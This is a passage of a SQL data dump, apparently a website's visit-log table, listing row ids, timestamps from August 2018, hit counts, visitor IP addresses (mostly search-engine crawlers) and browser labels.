),(295530,1535391721,1,1,0,0,'91.196.178.35','chrome'),(295531,1535391914,1,1,0,0,'159.89.207.77','chrome'),(295532,1535392118,1,1,0,0,'54.36.148.113','other'),(295533,1535392135,1,1,0,0,'91.196.178.73','chrome'),(295534,1535392439,2,2,0,0,'216.244.66.241','other'),(295535,1535392628,1,1,0,0,'193.106.30.99','firefox'),(295536,1535392693,1,1,0,0,'141.8.132.19','other'),(295537,1535392796,1,1,0,0,'54.36.149.59','other'),(295538,1535392826,1,1,0,0,'54.36.149.15','other'),(295539,1535393397,1,1,0,0,'54.36.148.116','other'),(295540,1535393552,1,1,0,0,'54.36.148.147','other'),(295541,1535393912,1,1,0,0,'54.36.148.195','other'),(295542,1535393994,1,1,0,0,'8.29.198.26','other'),(295543,1535394316,1,1,0,0,'5.45.207.69','other'),(295544,1535394484,1,1,0,0,'216.244.66.241','other'),(295545,1535394514,1,1,0,0,'54.36.149.104','other'),(295546,1535394644,1,1,0,0,'54.36.149.60','other'),(295547,1535394840,1,0,1,0,'66.249.66.157',''),(295548,1535395109,1,1,0,0,'54.36.148.96','other'),(295549,1535395251,1,1,0,0,'54.36.149.1','other'),(295550,1535395530,1,1,0,0,'66.249.66.59','chrome'),(295551,1535395857,1,1,0,0,'54.36.148.189','other'),(295552,1535396139,1,1,0,0,'37.9.113.115','other'),(295553,1535396153,1,1,0,0,'87.250.224.46','other'),(295554,1535396157,1,1,0,0,'141.8.142.74','other'),(295555,1535396162,1,1,0,0,'178.154.171.88','other'),(295556,1535396292,1,1,0,0,'54.36.148.46','other'),(295557,1535396528,1,1,0,0,'54.36.148.240','other'),(295558,1535396566,2,0,2,0,'66.249.66.157',''),(295559,1535397128,4,4,0,0,'216.244.66.241','other'),(295560,1535397294,1,1,0,0,'193.106.30.99','firefox'),(295561,1535397645,1,1,0,0,'54.36.149.35','other'),(295562,1535397916,1,1,0,0,'178.154.200.41','other'),(295563,1535398196,1,1,0,0,'54.36.149.49','other'),(295564,1535398428,1,1,0,0,'54.36.148.245','other'),(295565,1535398726,1,0,1,0,'66.249.66.157',''),(295566,1535399428,1,1,0,0,'216.244.66.241','other'),(295567,1535399510,2,2,0,0,'54.36.148.59','other'),(295568,1535399545,1,1,0,0,'54.36.149.28','other'),(295569,1535399737,1,1,0,0,'54.36.148.228','other'),(295570,1535400126,1,1,0,0,'54.36.148.137','other'),(295571,1535400325,3,3,0,0,'141.8.142.74','other'),(295572,1535400628,1,1,0,0,'54.36.148.210','other'),(295573,1535400684,2,2,0,0,'178.154.171.88','other'),(295574,1535401579,1,1,0,0,'37.9.113.182','other'),(295575,1535401665,2,2,0,0,'216.244.66.241','other'),(295576,1535401668,1,1,0,0,'54.36.148.131','other'),(295577,1535401801,1,1,0,0,'54.36.148.255','other'),(295578,1535401982,1,1,0,0,'54.36.148.70','other'),(295579,1535401999,1,1,0,0,'157.55.39.101','other'),(295580,1535402163,1,1,0,0,'193.106.30.99','firefox'),(295581,1535402406,3,3,0,0,'178.154.171.88','other'),(295582,1535402415,1,1,0,0,'54.36.148.185','other'),(295583,1535403242,1,1,0,0,'54.36.148.103','other'),(295584,1535403294,1,1,0,0,'87.250.224.46','other'),(295585,1535403412,1,1,0,0,'66.249.66.155','chrome'),(295586,1535403446,1,1,0,0,'66.249.66.57','chrome'),(295587,1535403965,1,0,1,0,'66.249.66.156',''),(295588,1535404330,1,1,0,0,'54.36.148.93','other'),(295589,1535404836,1,1,0,0,'54.36.148.21','other'),(295590,1535404844,1,1,0,0,'8.29.198.26','other'),(295591,1535404890,1,1,0,0,'91.209.11.236','other'),(295592,1535404929,1,1,0,0,'54.36.148.22','other'),(295593,1535404976,2,2,0,0,'216.244.66.241','other'),(295594,1535405173,1,1,0,0,'54.36.149.32','other'),(295595,1535405668,1,1,0,0,'54.36.148.172','other'),(295596,1535405970,1,1,0,0,'54.36.148.67','other'),(295597,1535406242,1,1,0,0,'54.36.149.101','other'),(295598,1535406546,1,1,0,0,'54.36.148.152','other'),(295599,1535406575,1,1,0,0,'54.36.148.230','other'),(295600,1535406741,1,1,0,0,'54.36.149.72','other'),(295601,1535406846,1,1,0,0,'193.106.30.99','firefox'),(295602,1535406914,1,1,0,0,'54.36.148.79','other'),(295603,1535407032,1,0,1,0,'66.249.66.155',''),(295604,1535407271,1,1,0,0,'54.36.149.43','other'),(295605,1535407321,1,1,0,0,'216.244.66.241','other'),(295606,1535407392,1,1,0,0,'40.77.167.192','other'),(295607,1535407650,1,1,0,0,'54.36.148.19','other'),(295608,1535407786,1,1,0,0,'54.36.148.232','other'),(295609,1535408075,1,1,0,0,'54.36.148.245','other'),(295610,1535408201,1,1,0,0,'54.36.149.52','other'),(295611,1535408375,1,1,0,0,'54.36.148.166','other'),(295612,1535408491,1,1,0,0,'54.36.148.169','other'),(295613,1535408697,1,1,0,0,'178.154.171.88','other'),(295614,1535408705,1,1,0,0,'54.36.149.84','other'),(295615,1535408896,1,1,0,0,'54.36.148.37','other'),(295616,1535409062,1,1,0,0,'54.36.148.235','other'),(295617,1535409087,1,1,0,0,'54.36.148.66','other'),(295618,1535409444,1,1,0,0,'54.36.148.178','other'),(295619,1535409508,1,1,0,0,'54.36.149.62','other'),(295620,1535409873,1,1,0,0,'216.244.66.241','other'),(295621,1535409974,1,1,0,0,'37.204.200.71','msie'),(295622,1535410240,1,1,0,0,'54.36.149.69','other'),(295623,1535410649,1,1,0,0,'54.36.148.224','other'),(295624,1535411305,1,1,0,0,'66.249.66.57','chrome'),(295625,1535411328,1,1,0,0,'54.36.149.100','other'),(295626,1535411366,1,1,0,0,'193.106.30.99','firefox'),(295627,1535411446,1,1,0,0,'141.8.142.74','other'),(295628,1535411571,1,1,0,0,'54.36.149.83','other'),(295629,1535411662,1,0,1,0,'66.249.66.156',''),(295630,1535411678,1,1,0,0,'54.36.149.86','other'),(295631,1535411766,1,0,1,0,'66.249.66.157',''),(295632,1535411878,1,1,0,0,'54.36.148.207','other'),(295633,1535411995,1,1,0,0,'54.36.148.214','other'),(295634,1535412321,3,3,0,0,'216.244.66.241','other'),(295635,1535412434,2,1,1,0,'66.249.66.155',''),(295636,1535412570,1,1,0,0,'54.36.149.16','other'),(295637,1535412623,1,1,0,0,'217.69.143.60','other'),(295638,1535412762,1,1,0,0,'54.36.149.38','other'),(295639,1535413020,1,1,0,0,'54.36.148.214','other'),(295640,1535413138,1,1,0,0,'54.36.149.97','other'),(295641,1535413165,1,1,0,0,'87.250.224.46','other'),(295642,1535413241,1,1,0,0,'54.36.149.90','other'),(295643,1535413265,1,1,0,0,'141.8.142.74','other'),(295644,1535413304,1,1,0,0,'54.36.148.30','other'),(295645,1535413332,1,1,0,0,'54.36.148.163','other'),(295646,1535413580,1,1,0,0,'54.36.148.107','other'),(295647,1535413592,1,1,0,0,'54.36.149.91','other'),(295648,1535414016,1,1,0,0,'54.36.148.179','other'),(295649,1535414082,1,1,0,0,'54.36.148.173','other'),(295650,1535414565,1,1,0,0,'54.36.149.84','other'),(295651,1535414754,1,1,0,0,'54.36.148.60','other'),(295652,1535414779,2,2,0,0,'216.244.66.241','other'),(295653,1535414822,1,1,0,0,'54.36.148.94','other'),(295654,1535414829,1,1,0,0,'54.36.148.181','other'),(295655,1535414909,1,1,0,0,'54.36.148.88','other'),(295656,1535415001,1,1,0,0,'141.8.142.74','other'),(295657,1535415017,1,1,0,0,'141.8.132.19','other'),(295658,1535415035,1,1,0,0,'95.163.255.176','other'),(295659,1535415305,1,1,0,0,'54.36.148.134','other'),(295660,1535415353,1,1,0,0,'54.36.148.174','other'),(295661,1535415622,1,1,0,0,'178.154.200.41','other'),(295662,1535415685,1,1,0,0,'8.29.198.27','other'),(295663,1535415852,1,1,0,0,'193.106.30.99','firefox'),(295664,1535416014,1,1,0,0,'54.36.148.113','other'),(295665,1535416071,1,1,0,0,'54.36.148.131','other'),(295666,1535416120,1,1,0,0,'54.36.148.209','other'),(295667,1535416366,1,1,0,0,'54.36.148.16','other'),(295668,1535416529,1,1,0,0,'216.244.66.241','other'),(295669,1535416755,1,1,0,0,'66.249.66.57','chrome'),(295670,1535416794,1,1,0,0,'178.154.171.88','other'),(295671,1535417279,1,1,0,0,'54.36.148.20','other'),(295672,1535417548,2,2,0,0,'216.244.66.241','other'),(295673,1535417659,1,1,0,0,'54.36.148.226','other'),(295674,1535417713,2,2,0,0,'178.154.171.88','other'),(295675,1535418538,1,1,0,0,'54.36.148.197','other'),(295676,1535418743,1,1,0,0,'54.36.148.19','other'),(295677,1535418843,1,1,0,0,'54.36.149.28','other'),(295678,1535418918,1,1,0,0,'54.36.148.143','other'),(295679,1535419125,2,1,1,0,'66.249.66.155',''),(295680,1535419433,1,1,0,0,'141.8.142.74','other'),(295681,1535419632,1,1,0,0,'37.9.113.182','other'),(295682,1535419971,1,1,0,0,'54.36.149.84','other'),(295683,1535420025,1,1,0,0,'54.36.148.159','other'),(295684,1535420422,1,1,0,0,'216.244.66.241','other'),(295685,1535420752,1,1,0,0,'54.36.149.62','other'),(295686,1535420933,1,1,0,0,'54.36.148.15','other'),(295687,1535421154,2,2,0,0,'141.8.132.19','other'),(295688,1535421442,1,1,0,0,'54.36.148.55','other'),(295689,1535421629,1,1,0,0,'54.36.148.39','other'),(295690,1535421787,1,1,0,0,'54.36.149.85','other'),(295691,1535421894,1,1,0,0,'54.36.148.111','other'),(295692,1535421905,1,1,0,0,'54.36.148.243','other'),(295693,1535421958,1,1,0,0,'37.9.113.182','other'),(295694,1535422103,1,1,0,0,'141.8.142.74','other'),(295695,1535422221,1,1,0,0,'54.36.149.43','other'),(295696,1535422618,1,1,0,0,'54.36.148.86','other'),(295697,1535422640,1,1,0,0,'54.36.148.79','other'),(295698,1535422939,10,10,0,0,'94.130.9.183','other'),(295699,1535423178,1,1,0,0,'54.36.148.172','other'),(295700,1535423322,2,2,0,0,'141.8.142.74','other'),(295701,1535423605,1,1,0,0,'54.36.148.169','other'),(295702,1535423645,1,1,0,0,'54.36.149.96','other'),(295703,1535423766,1,1,0,0,'54.36.149.98','other'),(295704,1535423848,8,8,0,0,'94.130.9.183','other'),(295705,1535424046,1,1,0,0,'54.36.148.34','other'),(295706,1535424072,1,1,0,0,'54.36.148.184','other'),(295707,1535424149,2,0,2,0,'66.249.66.57',''),(295708,1535424305,2,1,1,0,'66.249.66.157',''),(295709,1535424380,1,1,0,0,'66.249.66.61','chrome'),(295710,1535424693,1,1,0,0,'141.8.142.74','other'),(295711,1535424767,8,8,0,0,'94.130.9.183','other'),(295712,1535424797,1,1,0,0,'54.36.149.79','other'),(295713,1535425342,1,1,0,0,'54.36.149.15','other'),(295714,1535425688,7,7,0,0,'94.130.9.183','other'),(295715,1535425758,1,1,0,0,'54.36.149.45','other'),(295716,1535425774,1,1,0,0,'157.55.39.166','other'),(295717,1535425885,1,1,0,0,'216.244.66.241','other'),(295718,1535425932,1,1,0,0,'54.36.148.172','other'),(295719,1535426030,1,1,0,0,'54.36.148.107','other'),(295720,1535426076,1,1,0,0,'54.36.148.170','other'),(295721,1535426428,1,1,0,0,'54.36.148.159','other'),(295722,1535426431,1,1,0,0,'37.9.113.110','other'),(295723,1535426535,1,1,0,0,'8.29.198.26','other'),(295724,1535426557,1,1,0,0,'54.36.149.66','other'),(295725,1535426574,1,1,0,0,'54.36.148.30','other'),(295726,1535426594,8,8,0,0,'94.130.9.183','other'),(295727,1535426697,2,2,0,0,'141.8.142.74','other'),(295728,1535426843,1,1,0,0,'130.180.219.102','chrome'),(295729,1535427197,1,1,0,0,'54.36.148.248','other'),(295730,1535427377,1,1,0,0,'40.77.167.192','other'),(295731,1535427406,1,1,0,0,'54.36.149.96','other'),(295732,1535427513,9,9,0,0,'94.130.9.183','other'),(295733,1535427732,1,1,0,0,'216.244.66.241','other'),(295734,1535427973,1,1,0,0,'54.36.148.124','other'),(295735,1535427997,1,1,0,0,'54.36.149.42','other'),(295736,1535428055,1,1,0,0,'54.36.148.34','other'),(295737,1535428123,1,1,0,0,'54.36.148.170','other'),(295738,1535428360,1,1,0,0,'54.36.149.33','other'),(295739,1535428416,4,4,0,0,'94.130.9.183','other'),(295740,1535428453,1,1,0,0,'54.36.148.95','other'),(295741,1535428461,1,0,1,0,'66.249.66.59',''),(295742,1535428530,2,0,2,0,'66.249.66.156',''),(295743,1535428697,1,0,1,0,'66.249.66.61',''),(295744,1535428718,2,0,2,0,'66.249.66.155',''),(295745,1535428786,1,1,0,0,'141.8.132.19','other'),(295746,1535428824,1,0,1,0,'66.249.66.157',''),(295747,1535428868,1,1,0,0,'54.36.148.194','other'),(295748,1535428952,1,1,0,0,'54.36.148.105','other'),(295749,1535428964,1,1,0,0,'54.36.148.43','other'),(295750,1535429083,1,1,0,0,'54.36.148.223','other'),(295751,1535429385,1,1,0,0,'54.36.148.122','other'),(295752,1535429547,1,1,0,0,'66.249.66.57','chrome'),(295753,1535429601,1,0,1,0,'66.249.66.156',''),(295754,1535430289,1,1,0,0,'54.36.149.31','other'),(295755,1535430455,1,1,0,0,'54.36.149.18','other'),(295756,1535430509,1,1,0,0,'54.36.148.41','other'),(295757,1535430571,1,1,0,0,'54.36.149.51','other'),(295758,1535430817,1,1,0,0,'54.36.149.45','other'),(295759,1535430939,1,1,0,0,'178.154.171.88','other'),(295760,1535431200,1,1,0,0,'141.8.142.74','other'),(295761,1535431321,2,2,0,0,'91.196.178.73','chrome'),(295762,1535431347,1,1,0,0,'54.36.148.12','other'),(295763,1535431663,2,2,0,0,'54.36.148.138','other'),(295764,1535432011,1,1,0,0,'54.36.148.124','other'),(295765,1535432067,1,1,0,0,'141.8.142.167','other'),(295766,1535432283,1,1,0,0,'54.36.148.228','other'),(295767,1535432769,2,2,0,0,'162.210.196.98','other'),(295768,1535433308,1,1,0,0,'54.36.148.75','other'),(295769,1535433717,1,1,0,0,'216.244.66.241','other'),(295770,1535433803,1,1,0,0,'54.36.148.223','other'),(295771,1535433829,1,1,0,0,'54.36.148.149','other'),(295772,1535434128,1,1,0,0,'77.111.244.28','chrome'),(295773,1535434371,1,1,0,0,'54.36.148.50','other'),(295774,1535434413,2,2,0,0,'141.8.142.74','other'),(295775,1535434420,16,16,0,0,'91.134.137.255','other'),(295776,1535434431,1,0,1,0,'66.249.66.157',''),(295777,1535434476,1,1,0,0,'54.36.148.78','other'),(295778,1535434762,1,1,0,0,'37.9.113.182','other'),(295779,1535435070,1,1,0,0,'54.36.149.91','other'),(295780,1535435288,1,1,0,0,'176.67.8.152','chrome'),(295781,1535435762,2,2,0,0,'87.250.224.46','other'),(295782,1535435769,1,1,0,0,'66.249.66.155','chrome'),(295783,1535435880,1,1,0,0,'54.36.149.48','other'),(295784,1535435905,1,1,0,0,'46.201.112.37','chrome'),(295785,1535435972,1,1,0,0,'54.36.148.34','other'),(295786,1535435995,2,0,2,0,'66.249.66.156',''),(295787,1535436166,3,3,0,0,'216.244.66.241','other'),(295788,1535436439,1,1,0,0,'217.27.154.74','firefox'),(295789,1535436451,1,1,0,0,'54.36.148.171','other'),(295790,1535436615,1,1,0,0,'141.8.142.74','other'),(295791,1535436639,1,1,0,0,'178.154.171.88','other'),(295792,1535436680,1,1,0,0,'66.249.66.57','chrome'),(295793,1535436738,1,1,0,0,'87.250.224.46','other'),(295794,1535437141,1,1,0,0,'62.205.134.182','msie'),(295795,1535437263,1,1,0,0,'52.34.24.33','chrome'),(295796,1535437305,1,1,0,0,'54.36.149.83','other'),(295797,1535437369,1,1,0,0,'8.29.198.25','other'),(295798,1535437504,1,1,0,0,'54.36.148.163','other'),(295799,1535437886,1,1,0,0,'54.36.148.236','other'),(295800,1535438348,1,1,0,0,'54.36.148.147','other'),(295801,1535438549,1,1,0,0,'180.76.15.156','other'),(295802,1535438824,1,1,0,0,'54.36.148.156','other'),(295803,1535438834,1,0,1,0,'66.249.66.155',''),(295804,1535438873,1,1,0,0,'54.36.148.146','other'),(295805,1535439006,1,0,1,0,'66.249.66.157',''),(295806,1535439022,1,1,0,0,'91.196.178.176','chrome'),(295807,1535439045,1,1,0,0,'54.36.148.214','other'),(295808,1535439316,1,1,0,0,'91.196.178.72','chrome'),(295809,1535439771,1,1,0,0,'54.36.148.251','other'),(295810,1535439802,1,1,0,0,'54.36.148.55','other'),(295811,1535439965,1,1,0,0,'54.36.148.64','other'),(295812,1535440145,2,2,0,0,'91.196.178.72','firefox'),(295813,1535440438,1,1,0,0,'54.36.148.60','other'),(295814,1535440468,1,1,0,0,'54.36.148.46','other'),(295815,1535440847,1,1,0,0,'91.196.178.65','chrome'),(295816,1535441454,1,1,0,0,'54.36.149.59','other'),(295817,1535441837,1,1,0,0,'54.36.148.87','other'),(295818,1535441941,1,1,0,0,'54.36.149.77','other'),(295819,1535442074,1,1,0,0,'178.154.171.88','other'),(295820,1535442186,1,1,0,0,'54.36.148.191','other'),(295821,1535442276,1,1,0,0,'54.36.149.45','other'),(295822,1535442299,1,1,0,0,'54.36.148.105','other'),(295823,1535442473,1,1,0,0,'54.36.149.65','other'),(295824,1535442503,1,1,0,0,'54.36.148.54','other'),(295825,1535442595,1,1,0,0,'66.249.66.57','chrome'),(295826,1535442906,1,1,0,0,'37.55.145.118','chrome'),(295827,1535442979,2,2,0,0,'141.8.142.74','other'),(295828,1535443131,1,1,0,0,'54.36.148.128','other'),(295829,1535443633,1,1,0,0,'178.154.171.88','other'),(295830,1535443644,1,1,0,0,'54.36.149.82','other'),(295831,1535443717,1,1,0,0,'54.36.148.209','other'),(295832,1535443749,1,1,0,0,'91.196.179.33','firefox'),(295833,1535443931,3,3,0,0,'216.244.66.241','other'),(295834,1535444056,1,1,0,0,'46.219.230.229','chrome'),(295835,1535444195,2,2,0,0,'54.36.149.52','other'),(295836,1535444206,1,1,0,0,'54.36.148.114','other'),(295837,1535444474,1,1,0,0,'157.55.39.201','other'),(295838,1535444588,1,1,0,0,'54.36.149.8','other'),(295839,1535445115,2,0,2,0,'66.249.66.155',''),(295840,1535445393,1,0,1,0,'66.249.66.157',''),(295841,1535445598,1,1,0,0,'54.36.148.139','other'),(295842,1535445833,1,1,0,0,'54.36.149.94','other'),(295843,1535445861,1,0,1,0,'66.249.66.156',''),(295844,1535445915,1,1,0,0,'91.196.178.169','chrome'),(295845,1535446008,1,1,0,0,'54.36.149.20','other'),(295846,1535446127,1,1,0,0,'95.132.17.206','firefox'),(295847,1535446377,2,2,0,0,'54.36.148.255','other'),(295848,1535446434,1,0,1,0,'66.249.66.155',''),(295849,1535446594,1,1,0,0,'54.36.148.233','other'),(295850,1535446684,1,1,0,0,'178.154.171.88','other'),(295851,1535446685,1,1,0,0,'54.36.149.34','other'),(295852,1535446714,1,1,0,0,'31.41.65.169','chrome'),(295853,1535446772,1,1,0,0,'54.36.149.81','other'),(295854,1535446920,1,1,0,0,'217.69.143.51','other'),(295855,1535446947,1,1,0,0,'78.111.187.249','chrome'),(295856,1535447068,1,1,0,0,'54.36.148.179','other'),(295857,1535447188,1,1,0,0,'54.36.148.159','other'),(295858,1535447223,1,1,0,0,'54.36.148.54','other'),(295859,1535447448,1,1,0,0,'54.36.148.84','other'),(295860,1535447815,1,1,0,0,'54.36.148.111','other'),(295861,1535447909,1,1,0,0,'54.36.148.75','other'),(295862,1535448079,1,1,0,0,'54.36.148.189','other'),(295863,1535448082,1,1,0,0,'95.135.5.30','chrome'),(295864,1535448116,1,1,0,0,'178.154.171.88','other'),(295865,1535448214,1,1,0,0,'8.29.198.26','other'),(295866,1535448276,1,1,0,0,'141.8.142.74','other'),(295867,1535448322,1,1,0,0,'54.36.148.14','other'),(295868,1535449226,1,1,0,0,'54.36.149.86','other'),(295869,1535449252,1,1,0,0,'216.244.66.241','other'),(295870,1535449377,1,1,0,0,'54.36.148.83','other'),(295871,1535449403,1,1,0,0,'54.36.148.242','other'),(295872,1535449469,1,1,0,0,'54.36.148.248','other'),(295873,1535450158,1,1,0,0,'54.36.148.191','other'),(295874,1535450817,1,1,0,0,'54.36.148.201','other'),(295875,1535450832,1,1,0,0,'54.36.148.49','other'),(295876,1535450979,1,0,1,0,'66.249.66.157',''),(295877,1535451095,1,1,0,0,'66.249.66.61','chrome'),(295878,1535451211,1,1,0,0,'54.36.149.65','other'),(295879,1535451449,1,1,0,0,'54.36.148.181','other'),(295880,1535451892,1,1,0,0,'54.36.148.104','other'),(295881,1535451966,2,2,0,0,'216.244.66.241','other'),(295882,1535451973,1,0,1,0,'66.249.66.157',''),(295883,1535452035,1,1,0,0,'54.36.148.94','other'),(295884,1535452084,1,0,1,0,'66.249.66.156',''),(295885,1535452266,1,0,1,0,'66.249.66.155',''),(295886,1535452295,1,1,0,0,'31.41.65.169','chrome'),(295887,1535452646,1,1,0,0,'54.36.148.212','other'),(295888,1535452832,1,1,0,0,'54.36.148.35','other'),(295889,1535452935,1,1,0,0,'54.36.148.149','other'),(295890,1535453231,2,2,0,0,'54.36.148.47','other'),(295891,1535453731,1,1,0,0,'66.102.9.136','chrome'),(295892,1535453969,1,1,0,0,'54.36.148.159','other'),(295893,1535454062,1,1,0,0,'54.36.149.99','other'),(295894,1535454142,2,2,0,0,'95.67.45.194','chrome'),(295895,1535454455,1,1,0,0,'54.36.148.69','other'),(295896,1535454549,1,1,0,0,'54.36.148.75','other'),(295897,1535454810,1,1,0,0,'216.244.66.241','other'),(295898,1535454827,2,2,0,0,'54.36.148.255','other'),(295899,1535455133,1,1,0,0,'54.36.148.200','other'),(295900,1535455560,1,1,0,0,'46.201.112.37','chrome'),(295901,1535455994,1,1,0,0,'91.196.178.163','chrome'),(295902,1535456115,1,1,0,0,'54.36.148.11','other'),(295903,1535456274,1,1,0,0,'54.36.148.234','other'),(295904,1535456539,1,1,0,0,'54.36.148.203','other'),(295905,1535456593,1,1,0,0,'54.36.148.32','other'),(295906,1535456644,1,1,0,0,'54.36.148.224','other'),(295907,1535456747,1,1,0,0,'54.36.148.60','other'),(295908,1535456907,1,1,0,0,'54.36.149.48','other'),(295909,1535456983,1,1,0,0,'54.36.148.183','other'),(295910,1535457183,1,1,0,0,'54.36.148.215','other'),(295911,1535457464,1,1,0,0,'54.36.148.138','other'),(295912,1535457477,1,1,0,0,'216.244.66.241','other'),(295913,1535457558,1,1,0,0,'180.76.15.26','other'),(295914,1535457814,1,1,0,0,'54.36.148.63','other'),(295915,1535457893,1,1,0,0,'141.8.142.74','other'),(295916,1535458284,1,0,1,0,'66.249.66.157',''),(295917,1535458288,1,1,0,0,'54.36.148.160','other'),(295918,1535458527,1,1,0,0,'54.36.149.1','other'),(295919,1535458573,1,1,0,0,'91.196.178.68','firefox'),(295920,1535458601,1,1,0,0,'66.249.66.61','chrome'),(295921,1535458634,2,2,0,0,'91.202.242.168','chrome'),(295922,1535458705,1,1,0,0,'176.126.162.35','chrome'),(295923,1535458940,1,1,0,0,'93.170.135.252','chrome'),(295924,1535459065,1,1,0,0,'8.29.198.27','other'),(295925,1535459188,1,1,0,0,'54.36.149.94','other'),(295926,1535459664,1,1,0,0,'54.36.149.30','other'),(295927,1535459722,1,1,0,0,'91.196.178.77','firefox'),(295928,1535459755,1,1,0,0,'54.36.149.9','other'),(295929,1535460104,1,1,0,0,'54.36.148.252','other'),(295930,1535460106,1,1,0,0,'54.36.148.33','other'),(295931,1535460263,1,1,0,0,'91.196.178.129','firefox'),(295932,1535460278,1,1,0,0,'91.196.178.162','chrome'),(295933,1535460446,1,1,0,0,'54.36.148.198','other'),(295934,1535460761,1,1,0,0,'54.36.148.46','other'),(295935,1535460891,1,1,0,0,'141.8.142.74','other'),(295936,1535460907,1,1,0,0,'54.36.148.114','other'),(295937,1535461197,1,1,0,0,'91.196.178.162','chrome'),(295938,1535461347,1,1,0,0,'54.36.149.12','other'),(295939,1535461592,1,1,0,0,'216.244.66.241','other'),(295940,1535462138,1,1,0,0,'91.196.178.162','chrome'),(295941,1535462517,1,0,1,0,'66.249.66.59',''),(295942,1535462560,1,0,1,0,'66.249.66.61',''),(295943,1535462717,1,1,0,0,'54.36.148.211','other'),(295944,1535463134,1,1,0,0,'54.36.149.19','other'),(295945,1535463446,1,1,0,0,'54.36.148.202','other'),(295946,1535463448,2,2,0,0,'141.8.142.74','other'),(295947,1535464027,1,1,0,0,'91.202.242.168','chrome'),(295948,1535464404,1,1,0,0,'54.36.149.106','other'),(295949,1535464816,1,1,0,0,'54.36.148.229','other'),(295950,1535465083,1,1,0,0,'54.36.149.101','other'),(295951,1535465329,1,1,0,0,'54.36.148.65','other'),(295952,1535465394,1,1,0,0,'54.36.149.29','other'),(295953,1535465493,1,1,0,0,'104.236.55.136','chrome'),(295954,1535465722,1,1,0,0,'62.205.134.182','msie'),(295955,1535466130,1,1,0,0,'54.36.148.161','other'),(295956,1535466162,1,1,0,0,'54.36.148.49','other'),(295957,1535466403,1,1,0,0,'141.8.142.74','other'),(295958,1535466543,1,1,0,0,'54.36.149.77','other'),(295959,1535466798,1,1,0,0,'54.36.148.169','other'),(295960,1535466856,1,1,0,0,'54.36.148.83','other'),(295961,1535467197,1,0,1,0,'66.249.66.59',''),(295962,1535467211,1,0,1,0,'66.249.66.61',''),(295963,1535467239,1,1,0,0,'54.36.148.34','other'),(295964,1535467412,1,1,0,0,'91.196.178.183','chrome'),(295965,1535467459,2,0,2,0,'66.249.66.157',''),(295966,1535467765,1,1,0,0,'54.36.148.17','other'),(295967,1535467778,1,0,1,0,'66.249.66.57',''),(295968,1535467812,1,1,0,0,'54.36.148.88','other'),(295969,1535467876,1,1,0,0,'54.36.148.48','other'),(295970,1535467896,1,1,0,0,'216.244.66.241','other'),(295971,1535467941,1,0,1,0,'66.249.66.156',''),(295972,1535467948,2,2,0,0,'66.249.66.61','chrome'),(295973,1535467960,1,1,0,0,'54.36.148.81','other'),(295974,1535468304,1,0,1,0,'66.249.66.155',''),(295975,1535468476,1,1,0,0,'66.249.66.155','chrome'),(295976,1535468819,1,1,0,0,'141.8.142.74','other'),(295977,1535469244,1,1,0,0,'130.180.219.24','chrome'),(295978,1535469364,1,1,0,0,'180.76.15.5','other'),(295979,1535469663,1,0,1,0,'66.249.66.157',''),(295980,1535469731,1,1,0,0,'54.36.148.203','other'),(295981,1535469908,1,1,0,0,'8.29.198.26','other'),(295982,1535469958,1,1,0,0,'54.36.149.83','other'),(295983,1535470023,1,1,0,0,'54.36.148.150','other'),(295984,1535470031,1,1,0,0,'54.36.148.82','other'),(295985,1535470104,1,1,0,0,'157.55.39.166','other'),(295986,1535470333,1,1,0,0,'54.36.148.119','other'),(295987,1535470368,1,1,0,0,'54.36.148.197','other'),(295988,1535470400,1,1,0,0,'54.36.148.85','other'),(295989,1535470415,1,1,0,0,'54.36.149.104','other'),(295990,1535470905,1,1,0,0,'54.36.148.241','other'),(295991,1535471068,1,1,0,0,'54.36.149.84','other'),(295992,1535471323,1,0,1,0,'66.249.66.156',''),(295993,1535471549,1,0,1,0,'66.249.66.57',''),(295994,1535471699,1,1,0,0,'54.36.148.103','other'),(295995,1535471747,1,1,0,0,'66.249.66.57','chrome'),(295996,1535472031,1,1,0,0,'54.36.148.217','other'),(295997,1535472073,1,1,0,0,'54.36.149.82','other'),(295998,1535472475,1,1,0,0,'54.36.148.191','other'),(295999,1535472777,1,1,0,0,'54.36.148.41','other'),(296000,1535472968,1,1,0,0,'54.36.148.37','other'),(296001,1535473065,1,1,0,0,'54.36.148.111','other'),(296002,1535473504,1,1,0,0,'54.36.149.85','other'),(296003,1535473539,1,1,0,0,'54.36.149.95','other'),(296004,1535473697,4,0,4,0,'66.249.66.155',''),(296005,1535473835,3,1,2,0,'66.249.66.157',''),(296006,1535474116,4,0,4,0,'66.249.66.156',''),(296007,1535474241,1,1,0,0,'54.36.149.11','other'),(296008,1535474246,1,1,0,0,'54.36.148.188','other'),(296009,1535474592,1,1,0,0,'91.196.178.65','firefox'),(296010,1535474931,1,0,1,0,'66.249.66.61',''),(296011,1535475008,1,1,0,0,'54.36.148.235','other'),(296012,1535475306,1,1,0,0,'54.36.148.209','other'),(296013,1535475380,2,2,0,0,'54.36.148.123','other'),(296014,1535475545,2,2,0,0,'141.8.142.74','other'),(296015,1535475550,1,1,0,0,'178.94.172.23','chrome'),(296016,1535475600,2,0,2,0,'66.249.66.157',''),(296017,1535475721,1,0,1,0,'66.249.66.155',''),(296018,1535475740,1,0,1,0,'66.249.66.156',''),(296019,1535475787,1,1,0,0,'54.36.148.197','other'),(296020,1535475822,1,1,0,0,'54.36.149.37','other'),(296021,1535476274,1,1,0,0,'54.36.148.198','other'),(296022,1535476397,1,1,0,0,'54.36.148.136','other'),(296023,1535476912,1,1,0,0,'54.36.148.217','other'),(296024,1535476956,1,1,0,0,'54.36.148.146','other'),(296025,1535477146,1,1,0,0,'178.154.171.88','other'),(296026,1535477177,1,1,0,0,'54.36.149.106','other'),(296027,1535477545,1,1,0,0,'54.36.148.206','other'),(296028,1535477857,1,0,1,0,'66.249.66.157',''),(296029,1535478237,1,0,1,0,'66.249.66.155',''),(296030,1535478496,1,1,0,0,'54.36.148.216','other'),(296031,1535479036,1,1,0,0,'66.249.66.57','chrome'),(296032,1535479158,1,1,0,0,'54.36.149.52','other'),(296033,1535479364,1,1,0,0,'52.53.201.78','chrome'),(296034,1535479608,1,1,0,0,'54.36.148.141','other'),(296035,1535479873,1,1,0,0,'54.36.149.78','other'),(296036,1535479952,1,1,0,0,'54.36.148.96','other'),(296037,1535480187,1,1,0,0,'54.36.149.104','other'),(296038,1535480753,1,1,0,0,'8.29.198.25','other'),(296039,1535481029,1,1,0,0,'54.36.148.129','other'),(296040,1535481040,1,1,0,0,'54.36.148.237','other'),(296041,1535481041,1,1,0,0,'207.46.13.135','other'),(296042,1535481067,1,1,0,0,'66.249.66.157','chrome'),(296043,1535481082,1,1,0,0,'66.249.66.61','chrome'),(296044,153548